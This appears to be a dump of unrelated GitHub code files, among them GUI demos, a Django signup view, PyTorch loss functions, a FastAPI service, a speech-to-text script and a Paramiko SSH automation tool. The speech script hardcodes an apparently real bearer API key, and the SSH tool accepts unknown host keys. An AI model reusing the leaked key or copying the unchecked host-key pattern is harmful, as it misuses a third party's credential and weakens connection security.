want\nLabel(root,text=\"Username\").grid(row=8)\nEntry(root).grid(row=8,column=1)\nLabel(root,text=\"Password\").grid(row=9)\nEntry(root).grid(row=9,column=1)\nCheckbutton()\nchk_state2=BooleanVar() #here BooleanVar() is tkinter variable not the python variable\nchk_state2.set(False)\nCheckbutton(root,text=\"Keep me logged in\",var=chk_state2).grid(row=10,column=1)\n#----Binding Function(calling functions whenever an event occur refers to binding fucntion)\n#----Event Handling\n# 1.--left click\n# 2.--middle click\n# 3.--Right click\nl8=Label(root, text= 'EventHandling' , font = 'arial 10 bold')\nl8.grid(row=11,column=0)\ni = 1\ndef click2(event):\n global i\n Label(root,text=\"Hi Akshith\").grid(row=12,column=i)\n i = i + 1\nbt = Button(root, text=\"click here for event handling\")\nbt.bind(\"\", click2) # to bind the button widget to event 
handler\nbt.grid(row=11, column=1) # Use grid instead of pack to place the button\n#----PhotoImage\nicon=PhotoImage(file=\"/home/bc2113449/projects/MadLibs/hyd.gif\")\nl9=Label(root, text= 'PhotoImage',font = 'arial 10 bold')\nl9.grid(row=13,column=0)\nLabel(root,image=icon).grid(row=13,column=1)\n\n\n\nroot.mainloop()\n\n","repo_name":"DamarlaAkshith/MadLibs","sub_path":"tkinter_demo.py","file_name":"tkinter_demo.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26548517924","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom account.api.serializers import RegistrationSerializer\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import api_view, permission_classes,authentication_classes\n\n# Register\n\n# Url: https:///api/register\n\n@api_view(['POST',])\n@csrf_exempt\n@authentication_classes([])\n@permission_classes([])\ndef userregister(request):\n print(\"hello\")\n print(\"hello\",request.method)\n if request.method == 'POST':\n serializer = RegistrationSerializer(data=request.data)\n data = {}\n print(\"hiiii\")\n print(request.data)\n print(serializer)\n if serializer.is_valid():\n print(\"valid\")\n account = serializer.save()\n data['response'] = 'successfully registered new user.'\n data['email'] = account.email\n data['name'] = account.name\n data['contact_number'] = account.contact_number\n\n token = Token.objects.get(user=account).key\n\n data['token'] = token\n\n else:\n data = serializer.errors\n\n return Response(data)\n\n","repo_name":"Him2703/redo-backend","sub_path":"account/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17273855288","text":"from typing import Optional\n\nimport torch\n\n\ndef dice_coeff(probabilities: torch.Tensor, labels: torch.Tensor, threshold: Optional[float] = None,\n reduction: Optional[str] = 'mean') -> torch.Tensor:\n \"\"\"Compute a mean hard or soft dice coefficient between a batch of probabilities and target\n labels. Reduction happens over the batch dimension; if None, return dice per example.\n \"\"\"\n # This factor prevents division by 0 if both prediction and GT don't have any foreground voxels\n smooth = 1e-3\n\n if threshold is not None:\n probabilities = probabilities.gt(threshold).float()\n # Flatten all dims except for the batch\n probabilities_flat = torch.flatten(probabilities, start_dim=1)\n labels_flat = torch.flatten(labels, start_dim=1)\n\n intersection = (probabilities_flat * labels_flat).sum(dim=1)\n volume_sum = probabilities_flat.sum(dim=1) + labels_flat.sum(dim=1) # it's not the union!\n dice = (2. * intersection + smooth) / (volume_sum + smooth)\n if reduction == 'mean':\n dice = torch.mean(dice)\n elif reduction == 'sum':\n dice = torch.sum(dice)\n\n return dice\n\n\nclass DiceLoss(torch.nn.Module):\n \"\"\"Takes logits as input.\"\"\"\n def __init__(self, threshold: Optional[float] = None, reduction: Optional[str] = 'mean',\n do_report_metric: bool = False):\n \"\"\"If no threshold is given, soft dice is computed, otherwise the predicted values are\n thresholded. 
Reduction happens over the batch dimension; if None, return dice per example.\n If do_report_metric, report the dice score instead of the dice loss (1 - dice score).\n \"\"\"\n super().__init__()\n\n if not do_report_metric and threshold is not None:\n raise ValueError('Dice metric should not use thresholding when used as a loss.')\n\n self.threshold = threshold\n self.reduction = reduction\n self.do_report_metric = do_report_metric\n\n def forward(self, logits: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n probabilities = torch.sigmoid(logits)\n if self.do_report_metric:\n return dice_coeff(probabilities, target, self.threshold, self.reduction)\n\n return 1.0 - dice_coeff(probabilities, target, self.threshold, self.reduction)\n\n\nclass BCEWithDiceLoss(torch.nn.Module):\n \"\"\"Weighted sum of Dice loss with binary cross-entropy.\"\"\"\n def __init__(self, reduction: str, bce_weight: float = 1.0):\n super().__init__()\n self.dice = DiceLoss(None, reduction, False)\n self.bce = torch.nn.BCEWithLogitsLoss(reduction=reduction)\n self.bce_weight = bce_weight\n\n def forward(self, logits: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n return self.bce_weight * self.bce(logits, target) + self.dice(logits, target)\n","repo_name":"menzelab/implicit-shape-reconstruction","sub_path":"impl_recon/utils/nn_utils.py","file_name":"nn_utils.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"5158713921","text":"from fastapi import HTTPException, UploadFile, status\nfrom image_service.interfaces.service import ImageServiceInterface\nfrom users.models import User\nfrom .interfaces.repositories_interface import RepositoriesInterface\nfrom typing import Optional\nfrom configs import IMAGES_DIR\nfrom .schemas import CreateOrUpdateProductSchema, QueryPriceSchema, QueryProductSchema\n\n\nclass ProductServices:\n def __init__(self, repository: RepositoriesInterface):\n self._repository = repository\n\n async def get_all_products(self, limit: Optional[int], offset: Optional[int],\n query_data: QueryProductSchema, price_query: QueryPriceSchema):\n return await self._repository.get_all_products(limit=limit, offset=offset,\n query_data=query_data.dict(exclude_none=True), price_query_data=price_query.dict(exclude_none=True))\n\n async def get_detail_product(self, product_id: int):\n return await self._repository.get_detail_product(product_id=product_id)\n\n async def delete_product(self, product_id: int, user: User, image_service: ImageServiceInterface):\n await self._repository.delete_product(product_id=product_id, user=user, image_service=image_service)\n\n async def create_product(self, data: CreateOrUpdateProductSchema,\n images: Optional[list[UploadFile]], user: User, image_service: ImageServiceInterface, host: str):\n created_data = data.dict(exclude_none=True)\n return await self._repository.create_product(product_data=created_data, user=user, images=images, image_service=image_service, host=host)\n\n async def update_product(self, product_id: int, data: CreateOrUpdateProductSchema, user: User,\n images: Optional[list[UploadFile]], image_service: ImageServiceInterface, host: str):\n updated_data = data.dict(exclude_none=True)\n result, product = await self._repository.update_product(product_id=product_id, user=user, updated_data=updated_data,\n images=images, image_service=image_service, host=host)\n if not result:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail='You 
cannot update this listing')\n return product\n\n async def get_favorites_product(self, limit: Optional[int], offset: Optional[int], user: User):\n return await self._repository.get_favorite_products(offset=offset, limit=limit, user=user)\n\n async def add_product_to_favorites(self, product_id: int, user: User):\n return await self._repository.add_product_to_favorites(product_id=product_id, user=user)\n\n async def remove_product_from_favorites(self, favorite_id: int, user: User):\n return await self._repository.remove_product_from_favorites(favorite_id=favorite_id, user=user)\n","repo_name":"sb-elliot-7s/ecommerce-app-fastapi","sub_path":"products/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"39374392194","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 15 16:19:53 2018\r\n\r\n@author: wilson\r\n\"\"\"\r\n\r\nimport requests\r\nimport json\r\nimport time\r\n# Imports the Google Cloud client library\r\nfrom google.cloud import language\r\nfrom google.cloud.language import enums\r\nfrom google.cloud.language import types\r\n\r\ndef get_entities(text):\r\n \"\"\"Detects entities in the text.\"\"\"\r\n client = language.LanguageServiceClient()\r\n\r\n # if isinstance(text, six.binary_type):\r\n # text = text.decode('utf-8')\r\n\r\n # Instantiates a plain text document.\r\n document = types.Document(\r\n content=text,\r\n type=enums.Document.Type.PLAIN_TEXT)\r\n\r\n # Detects entities in the document. You can also analyze HTML with:\r\n # document.type == enums.Document.Type.HTML\r\n entities = client.analyze_entities(document).entities\r\n\r\n # entity types from enums.Entity.Type\r\n # entity_type = ('UNKNOWN', 'PERSON', 'LOCATION', 'ORGANIZATION',\r\n # 'EVENT', 'WORK_OF_ART', 'CONSUMER_GOOD', 'OTHER')\r\n\r\n entityList = []\r\n for entity in entities:\r\n if entity.name not in entityList:\r\n entityList.append(entity.name)\r\n \r\n return entityList\r\n\r\nAPI_KEY = \"Bearer 01MupYze44lFlPrwIkG5iyTfI_jGDPYvee_gxfvmi6n_LMU5WHq99oT0urmtXZQUO9pJOcD0XT3SI8nHXEYFMkcm_5vgk\"\r\nHEADERS = {'Authorization': API_KEY}\r\n\r\ndef submit_job_url(media_url):\r\n url = \"https://api.rev.ai/revspeech/v1beta/jobs\"\r\n payload = {'media_url': media_url,\r\n 'metadata': \"Hack MIT Team LERL\"}\r\n request = requests.post(url, headers=HEADERS, json=payload)\r\n\r\n if request.status_code != 200:\r\n raise\r\n\r\n response_body = request.json()\r\n return response_body['id']\r\n\r\ndef view_job(id):\r\n url = f'https://api.rev.ai/revspeech/v1beta/jobs/{id}'\r\n request = requests.get(url, headers=HEADERS)\r\n\r\n if request.status_code != 200:\r\n raise\r\n\r\n response_body = request.json()\r\n return response_body\r\n\r\ndef get_transcript(id):\r\n url = f'https://api.rev.ai/revspeech/v1beta/jobs/{id}/transcript'\r\n headers = HEADERS.copy()\r\n headers['Accept'] = 'application/vnd.rev.transcript.v1.0+json'\r\n request = requests.get(url, headers=headers)\r\n\r\n if request.status_code != 200:\r\n raise\r\n\r\n response_body = request.json()\r\n return response_body\r\n\r\ndef get_text_body(id):\r\n transcript = get_transcript(id)\r\n textBody = ''\r\n for monologue in transcript.values():\r\n for item in monologue:\r\n for nextItem in item['elements']:\r\n textBody = textBody + nextItem['value']\r\n print(len(textBody.split()))\r\n return textBody\r\n\r\ndef test_workflow_with_url(url):\r\n print (\"Submitting job with URL\")\r\n id = 
submit_job_url(url)\r\n print (\"Job created\")\r\n print ('ID: ' + id )\r\n view_job(id)\r\n \r\n while True:\r\n job = view_job(id)\r\n status = job[\"status\"]\r\n print (f'Checking job transcription status: { status }')\r\n if status == \"transcribed\":\r\n break\r\n if status == \"failed\":\r\n raise\r\n\r\n print (\"Trying in another 10 seconds\")\r\n time.sleep(10)\r\n\r\n return get_transcript(id)\r\n\r\ndef main():\r\n # Testing with URL\r\n media_url = \"http://www.obamadownloads.com/mp3s/yes-we-can-speech.mp3\"\r\n # get_entities(test_workflow_with_url(media_url))\r\n print(get_entities(get_text_body(216064345)))\r\n\r\n\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"esatterfield32/hackMIT2018","sub_path":"hackmitMicroserver.py","file_name":"hackmitMicroserver.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772787781","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Matrix', Difficult='Medium')\n\n\nclass numMatrix:\n def __init__(self, mat):\n self.mat = mat\n self.rowLen = len(mat)\n self.colLen = len(mat[0])\n self.ans = 0\n\n def sumRange(self, p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n\n for r in range(x1, x2 + 1):\n for c in range(y1, y2 + 1):\n self.ans += self.mat[r][c]\n\n return self.ans\n\n\nmat = [[3, 0, 1, 4, 2],\n [5, 6, 3, 2, 1],\n [1, 2, 0, 1, 5],\n [4, 1, 0, 1, 7],\n [1, 0, 3, 0, 5]]\n\np1 = (2, 1)\np2 = (4, 3)\n\np1 = (1, 1)\np2 = (2, 2)\nn = numMatrix(mat)\nprint(n.sumRange(p1, p2))\n","repo_name":"Omkar02/FAANG","sub_path":"G_LC_304_RangeSumQuery2DImmutable.py","file_name":"G_LC_304_RangeSumQuery2DImmutable.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"38191714863","text":"import paramiko\r\nimport sys\r\nimport time\r\nimport os\r\nimport socket\r\nfrom pygments import highlight, lexers, formatters\r\nimport re\r\nimport json\r\nimport argparse\r\n\r\n\r\n# pip install pygments\r\n# pip install paramiko\r\n\r\n\r\nclass bcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n GRAY = \"\\033[1;30;40m\"\r\n\r\n\r\nparser = argparse.ArgumentParser(description='')\r\nparser.add_argument('-f', '--file', type=str, required=False, metavar='', help='provide the hosts file')\r\nresults = parser.parse_args()\r\nhosts_file = results.file\r\nif hosts_file is None:\r\n print(\"[ Error ] \" + bcolors.FAIL + \"--file option must be specified\" + bcolors.ENDC)\r\n print('')\r\n parser.print_help(sys.stderr)\r\n exit(1)\r\nif not os.path.isfile(hosts_file):\r\n print(\"[ Error ] \" + bcolors.FAIL + \"({}) is NOT a File\".format(hosts_file) + bcolors.ENDC)\r\n print('')\r\n parser.print_help(sys.stderr)\r\n exit(1)\r\n\r\n\r\ndef hosts(file=hosts_file):\r\n hosts_file_ = open(file, 'r')\r\n h1 = hosts_file_.read().split(\"\\n\")\r\n info = {}\r\n info['hosts'] = [string for string in h1 if string != '']\r\n info['hosts_number'] = len(info['hosts'])\r\n return info\r\n\r\n\r\ndef get_stderr(string, search='\\^'):\r\n \"\"\"\r\n function to search for keywords inside of text and to get several lines of the matched keywords\r\n so that it 
can be represented as STDERR\r\n :param string: string text to search for an error keyword\r\n :param search: Regex search in the text provided in \"String\" Parameter'\r\n :return: dict consists of 2 keys {list: list of matched lines (can contain empty lines), string: matched lines as a string}\r\n \"\"\"\r\n n = 0\r\n string_list_with_number = {}\r\n found_with_number = {}\r\n string_list = string.split(\"\\n\") # split the text into lines separated by \"new line\"\r\n for line in string_list: # create a dict \"string_list_with_number\" which consists of line number & text of each line\r\n n += 1\r\n string_list_with_number[n] = line\r\n found = re.findall(\"{}.*$\".format(search), line) # searches the keyword inside the lines\r\n found_with_number[\r\n n] = found # dict \"found_with_number\" consists of line number & matched lines; lines that does\r\n # not match the search will be empty arr like: {1: [], 2: [], 3: ['% bla bla], 4: []}\r\n\r\n err_lines = []\r\n for key, value in found_with_number.items(): # iterate over matched lines in the dict \"found_with_number\"\r\n if value:\r\n err_lines.append(key) # save the line number of the matched lines in \"err_lines\" list\r\n\r\n result = []\r\n lines_to_print = []\r\n for num in err_lines:\r\n num -= 1 # get a previous line (to get the command line)\r\n for i in range(6): # get 6 lines after the error detected line\r\n lines_to_print.append(\r\n num + i) # append the result to \"lines_to_print\" dict (which contains needed line numbers)\r\n try:\r\n for i in list(set(lines_to_print)): # list(set(lines_to_print)) --> to get rid of duplicates\r\n result.append(string_list_with_number[i]) # save the matched lines (strings) to \"result\" list\r\n\r\n except KeyError:\r\n return\r\n finally:\r\n dict = {'list': result, 'string': '\\n'.join(result)}\r\n return dict\r\n\r\n\r\nclass SSH_Connect:\r\n \"\"\"\r\n Class to Connect & execute commands to hosts/devices via ssh\r\n \"\"\"\r\n\r\n def __init__(self, host, user, password, port=22, ssh_timeout=10, allow_agent=False):\r\n self.info = {}\r\n self.hosts = None\r\n self.host = host\r\n self.user = user\r\n self.password = password\r\n self.port = port\r\n self.ssh_timeout = ssh_timeout\r\n self.is_connected = False\r\n self.channel = None\r\n\r\n print(\"[ INFO ] \" + bcolors.WARNING + \"Trying to connect to (%s)\" % self.host + bcolors.ENDC)\r\n i = 1\r\n while True:\r\n try:\r\n self.ssh = paramiko.SSHClient()\r\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n self.ssh.connect(self.host, self.port, self.user, self.password, timeout=self.ssh_timeout,\r\n allow_agent=allow_agent, look_for_keys=False)\r\n self.is_connected = True\r\n connected_msg = (\"[ INFO ] \" + bcolors.OKGREEN + \"Connected to (%s)\" % self.host + bcolors.ENDC)\r\n print(connected_msg)\r\n\r\n self.channel = self.ssh.invoke_shell()\r\n output = self.channel.recv(9999)\r\n self.channel.send_ready()\r\n time.sleep(1)\r\n break\r\n except paramiko.AuthenticationException as e:\r\n print(\r\n \"[ ERROR ] \" + bcolors.FAIL + \"Authentication failed when connecting to %s\" % self.host + bcolors.ENDC)\r\n print(\"\\t --> \" + str(e))\r\n print(\"\\t --> (%s) \" % self.host + bcolors.FAIL + \"Skipped\" + bcolors.ENDC)\r\n print(\"\")\r\n break\r\n except socket.gaierror as e:\r\n print(\r\n \"[ ERROR ] \" + bcolors.FAIL + \"Could not resolve hostname (%s) Name or service not known\" % self.host + bcolors.ENDC)\r\n print(\"\\t --> \" + str(e))\r\n print(\"\\t --> (%s) \" % self.host + bcolors.FAIL + 
\"Skipped\" + bcolors.ENDC)\r\n print(\"\")\r\n break\r\n except (paramiko.ssh_exception.NoValidConnectionsError, paramiko.SSHException, socket.error) as e:\r\n print(\r\n \"[ ERROR ] \" + bcolors.FAIL + \"Not able to establish ssh connection with %s\" % self.host + bcolors.ENDC + \" , Trying again...\")\r\n print(\"\\t --> \" + str(e))\r\n i += 1\r\n time.sleep(1)\r\n if i == 5:\r\n print(\"[ ERROR ] \" + bcolors.FAIL + \"Could not connect to %s. Giving up\" % self.host + bcolors.ENDC)\r\n print(\"\\t --> (%s) \" % self.host + bcolors.FAIL + \"Skipped\" + bcolors.ENDC)\r\n print(\"\")\r\n break\r\n\r\n def print(self, msg, level='info', force=False):\r\n \"\"\"\r\n Method to Print with different print Levels ('info', 'warn', 'fail')\r\n :param force: by default it NOT print if the failed to connect to the host, use this option to print anyway\r\n :param level: info (green color), warn(yellow color), fail(red color)\r\n :param msg: The message to be printed\r\n :return:\r\n \"\"\"\r\n color = None\r\n start = None\r\n if level == 'info':\r\n color = bcolors.OKGREEN\r\n start = bcolors.GRAY + \"-- INFO --\" + bcolors.ENDC\r\n elif level == 'warn':\r\n color = bcolors.WARNING\r\n start = bcolors.GRAY + \"-- WARNING --\" + bcolors.ENDC\r\n elif level == 'fail':\r\n color = bcolors.FAIL\r\n start = bcolors.GRAY + \"[FAIL]\" + bcolors.ENDC\r\n else:\r\n print(\r\n bcolors.FAIL + \" Supported print level options are: ['info', 'warn', 'fail'] - Your input: ({})\".format(\r\n level) + bcolors.ENDC)\r\n exit(1)\r\n if not force:\r\n if self.is_connected:\r\n print(start + color + ' ' + msg + bcolors.ENDC)\r\n else:\r\n print(start + color + ' ' + msg + bcolors.ENDC)\r\n\r\n def exec_cmd(self, cmd):\r\n \"\"\"\r\n Run a command on a remote host via ssh (Suitable for Servers)\r\n :param cmd: Command to run on a remote host\r\n :return: dict\r\n \"\"\"\r\n if self.is_connected:\r\n stdin, stdout, stderr = self.ssh.exec_command(cmd)\r\n self.info['connected'] = self.is_connected\r\n self.info['cmd'] = cmd\r\n self.info['stdout'] = stdout.read().decode(\"utf-8\")\r\n self.info['stderr'] = stderr.read().decode(\"utf-8\")\r\n self.info['exit_code'] = stdout.channel.recv_exit_status()\r\n return self.info\r\n elif not self.is_connected:\r\n self.info['cmd'] = cmd\r\n self.info['connected'] = self.is_connected\r\n self.info['stdout'] = ''\r\n self.info['stderr'] = (\"Failed to connect to %s\" % self.host)\r\n self.info['exit_code'] = ''\r\n return self.info\r\n\r\n def shell(self, cmd=None, cmd_from_file=None, print_stdout=False, stderr_search_keyword='\\^', exit_on_fail=True,\r\n print_json=False, search=None):\r\n \"\"\"\r\n Method to execute shell commands through SSH shell channel, similar to attaching to a shell session\r\n :param cmd_from_file: to run commands from a text file\r\n :param exit_on_fail: fail if STDERR is found\r\n :param stderr_search_keyword: by default it searches for \"^\" to catch stderr on Cisco devices, you can change it as it suits you\r\n :param print_json: Whether to print JSON to output\r\n :param cmd: command to be run, make sure the the command ends with a new line, i.e \"sh vlan br\\n\"\r\n :param print_stdout: to print cmd stdout in terminal with (Blue color)\r\n :param search: Option to Search the command stdout with Regexp\r\n :return: dictionary\r\n \"\"\"\r\n\r\n if self.is_connected:\r\n\r\n if (cmd_from_file is not None) and (cmd is not None):\r\n print(\"[ Error ] \" + bcolors.FAIL + \"You can only use 'cmd' or 'cmd_from_file' options\" + bcolors.ENDC)\r\n 
exit(1)\r\n\r\n if cmd_from_file is not None:\r\n if os.path.exists(cmd_from_file):\r\n f = open(cmd_from_file, 'r')\r\n cmd = f.read()\r\n elif not os.path.isfile(cmd_from_file):\r\n print(\r\n \"[ Error ] \" + bcolors.FAIL + \"You've specified 'cmd_from_file option' but ({}) is NOT a file\".format(\r\n cmd_from_file) + bcolors.ENDC)\r\n exit(1)\r\n\r\n self.channel.send(cmd + '\\n' + '\\n')\r\n time.sleep(2)\r\n self.info['cmd'] = cmd.replace(\"\\r\", '').split(\"\\n\")\r\n cmd_original = self.info['cmd']\r\n self.info['connected'] = self.is_connected\r\n self.info['stdout'] = self.channel.recv(9999).decode(\"utf-8\")\r\n stdout_original = self.info['stdout']\r\n self.info['stderr'] = get_stderr(stdout_original, stderr_search_keyword)['string'].replace(\"\\r\", '').split(\r\n \"\\n\")\r\n self.info['search'] = search\r\n self.info['search_found?'] = None\r\n self.info['search_match'] = None\r\n stderr_ = [x for x in self.info['stderr'] if x]\r\n if len(stderr_) > 0:\r\n self.info['exit_code'] = 1\r\n else:\r\n self.info['stderr'] = []\r\n self.info['exit_code'] = 0\r\n if search:\r\n found = re.findall(search, self.info['stdout'])\r\n if len(found) > 0:\r\n self.info['search_match'] = found\r\n self.info['search_found?'] = True\r\n else:\r\n self.info['search_found?'] = False\r\n\r\n if print_json:\r\n self.info['stdout'] = self.info['stdout'].replace(\"\\r\", '')\r\n self.info['stdout'] = self.info['stdout'].split(\"\\n\")\r\n self.info['cmd'] = [x for x in self.info['cmd'] if x]\r\n formatted_json = json.dumps(self.info, indent=4, sort_keys=True, ensure_ascii=False)\r\n colorful_json = highlight(formatted_json.encode('utf8'), lexers.JsonLexer(),\r\n formatters.TerminalFormatter())\r\n print(colorful_json)\r\n self.info['stdout'] = stdout_original\r\n self.info['cmd'] = cmd_original\r\n else:\r\n self.info['stdout'] = stdout_original\r\n\r\n if print_stdout:\r\n print(bcolors.OKBLUE + stdout_original + bcolors.ENDC)\r\n if exit_on_fail:\r\n if self.info['exit_code'] > 0:\r\n print(\"\")\r\n print(bcolors.FAIL + \"* * * * * * * * * * * * * * * * * * * * * * *\" + bcolors.ENDC)\r\n print(\"[ ERROR ] \" + bcolors.FAIL + \"Found the following Error:\" + bcolors.ENDC)\r\n print('')\r\n err = get_stderr(stdout_original, stderr_search_keyword)['string']\r\n # for c in self.info['cmd']:\r\n # print(bcolors.OKBLUE + c + bcolors.ENDC)\r\n print('')\r\n print(bcolors.FAIL + err + bcolors.ENDC)\r\n print(bcolors.FAIL + \"* * * * * * * * * * * * * * * * * * * * * * *\" + bcolors.ENDC)\r\n print(\"\")\r\n exit(1)\r\n return self.info\r\n\r\n elif not self.is_connected:\r\n self.info['cmd'] = cmd\r\n self.info['connected'] = self.is_connected\r\n self.info['stdout'] = ''\r\n self.info['stderr'] = (\"Failed to connect to %s\" % self.host)\r\n self.info['search_found?'] = None\r\n self.info['search_match'] = None\r\n self.info['exit_code'] = None\r\n return self.info\r\n\r\n def close(self):\r\n \"\"\"\r\n Close the ssh session, ssh session is opened at the initialization of the Class\r\n :return:\r\n \"\"\"\r\n self.ssh.close()\r\n","repo_name":"eslam-gomaa/Flexible_Nework_Automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"10744835114","text":"import unittest\nimport os\nfrom python.housinginsights.ingestion import LoadData as load_data\nfrom sqlalchemy.exc import ProgrammingError\n\nPYTHON_PATH = load_data.PYTHON_PATH\n\n\nclass 
MyTestCase(unittest.TestCase):\n def setUp(self):\n # use test data\n test_data_path = os.path.abspath(os.path.join(PYTHON_PATH, 'tests',\n 'test_data'))\n self.meta_path = os.path.abspath(os.path.join(test_data_path,\n 'meta_load_data.json'))\n self.manifest_path = os.path.abspath(\n os.path.join(test_data_path, 'manifest_load_data.csv'))\n self.database_choice = 'docker_database'\n self.loader = load_data.LoadData(database_choice=self.database_choice,\n meta_path=self.meta_path,\n manifest_path=self.manifest_path)\n\n def query_db(self, engine, query):\n \"\"\"\n Helper function that returns the result of querying the database.\n \"\"\"\n try:\n query_result = engine.execute(query)\n return [dict(x) for x in query_result.fetchall()]\n except ProgrammingError as e:\n self.assertEqual(True, False, e)\n\n def test_update_only(self):\n # use the same sql engine for db lookup\n loader_engine = self.loader.engine\n\n # start with empty database\n self.loader._drop_tables()\n result = loader_engine.table_names()\n self.assertEqual(len(result), 0)\n\n # load crime data one at a time without overriding\n # existing data\n crime_data = ['crime_2016', 'crime_2015', 'crime_2017']\n table_name = 'crime'\n\n for idx, data_id in enumerate(crime_data, start=1):\n these_data = [data_id]\n result = self.loader.update_database(unique_data_id_list=these_data)\n self.assertTrue(data_id in result)\n\n # validate database contents\n query = \"SELECT DISTINCT unique_data_id FROM crime\"\n results = self.query_db(loader_engine, query)\n\n self.assertEqual(len(results), idx)\n\n for result in results:\n self.assertTrue(result['unique_data_id'] in crime_data)\n\n # there's only 'crime' and manifest table in database\n result = loader_engine.table_names()\n self.assertEqual(len(result), 2)\n self.assertTrue(table_name in result)\n self.assertTrue('manifest' in result)\n\n # make sure database is not empty\n self.loader.rebuild()\n result = loader_engine.table_names()\n self.assertTrue(len(result) > 0)\n\n # update sample of data_ids and make sure no duplications\n these_data = ['project', 'crime_2017', 'dchousing_subsidy']\n\n # get current table and unique_data_id row counts\n tables = ['project', 'crime', 'subsidy']\n tables_row_counts = []\n data_id_row_counts = []\n\n for idx, table in enumerate(tables):\n # get table counts\n query = \"SELECT COUNT(*) FROM {}\".format(table)\n result = self.query_db(loader_engine, query)\n tables_row_counts.append(result[0]['count'])\n\n # get unique_data_id counts\n query = \"SELECT COUNT(*) FROM {} WHERE unique_data_id = \" \\\n \"'{}'\".format(table, these_data[idx])\n result = self.query_db(loader_engine, query)\n data_id_row_counts.append(result[0]['count'])\n\n processed_data_id = self.loader.update_database(these_data)\n\n for data_id in these_data:\n self.assertTrue(data_id in processed_data_id)\n\n for idx, table in enumerate(tables):\n # get updated table counts\n query = \"SELECT COUNT(*) FROM {}\".format(table)\n result = self.query_db(loader_engine, query)\n self.assertEqual(result[0]['count'], tables_row_counts[idx])\n\n # get updated unique_data_id counts\n query = \"SELECT COUNT(*) FROM {} WHERE unique_data_id = \" \\\n \"'{}'\".format(table, these_data[idx])\n result = self.query_db(loader_engine, query)\n self.assertEqual(result[0]['count'], data_id_row_counts[idx])\n\n def test_create_list(self):\n # Note - you will need to modify folder path to match local env\n folder_path = os.path.join(PYTHON_PATH, os.pardir, 'data', 'raw',\n 'apis', '20170528')\n result 
= self.loader.create_list(folder_path)\n print(result)\n self.assertEqual(len(result), 13)\n\n def test_rebuild(self):\n result = self.loader.rebuild()\n self.assertTrue(result)\n\n def test_make_manifest(self):\n folder_path = os.path.join(PYTHON_PATH, os.pardir, 'data', 'raw',\n 'apis')\n fields = self.loader.manifest.keys\n print(fields)\n self.assertTrue(fields)\n result_path = self.loader.make_manifest(folder_path)\n self.assertEqual(self.loader.manifest.path, result_path)\n\n # TODO - write test code\n def test__remove_existing_data(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ajhalani/housing-insights","sub_path":"python/tests/test_load_data.py","file_name":"test_load_data.py","file_ext":"py","file_size_in_byte":5235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"74580539682","text":"#(i)assigning elements to different lists\n#I didnt understand the question\n#I did contact captain aviral multiple times in multiple platfoms\n#but couldnt find the response i needed\n#I also reminded him in the live(on 3rd july) but in vain\n#anyways, this is what I understood\n#and am finally writing this code because\n#I waited for almost 48 hours and am still waiting for the responce\ndef i():\n l1=list(input(\"enter the elements to be assigned to the 1st list \").split())\n l2=list(input(\"enter the elements to be assigned to the 2nd list \").split())\n print(\"elements of 1st list \",l1)\n print(\"elements of 2nd list \",l2)\n\n#(ii)accessing elements from tuple \ndef ii():\n t=tuple(input(\"enter the elements of the tuple \").split())\n index=int(input(\"enter index of the element to be accessed\"))\n print(\"you have accessed the element \",t[index])\n\n#(iii)deleting different dictionary elements\ndef iii():\n i=0\n dictionary={}\n keys=list(input(\"enter the keys to be entered in the dictionary \").split())\n values=list(input(\"enter the values to be entered in the dictionary \").split())\n if len(keys) != len(values):\n print(\"length of values not equal with lenght of keys \")\n return\n for key in keys:\n dictionary[key]=values[i]\n i+=1\n delete=input(\"enter the key at which the value will be deleted \")\n if delete in keys:\n del dictionary[delete]\n else:\n print(\"invalid key\")\n print(\"the present dictionary is \",dictionary)\n\ndecision=input(\"enter i for assigning elements to different lists\\nii for accessing elements from tuple\\niii for deleting different dictionary elements \")\nif decision == \"i\":\n i()\nelif decision == \"ii\":\n ii()\nelif decision == \"iii\":\n iii()\nelse:\n print(\"invalid option\")\n","repo_name":"akula0611/fuctions","sub_path":"coding functions.py","file_name":"coding functions.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71741647841","text":"import tensorflow as tf\nimport tensorflow.contrib.seq2seq as seq2seq\n\n\nclass 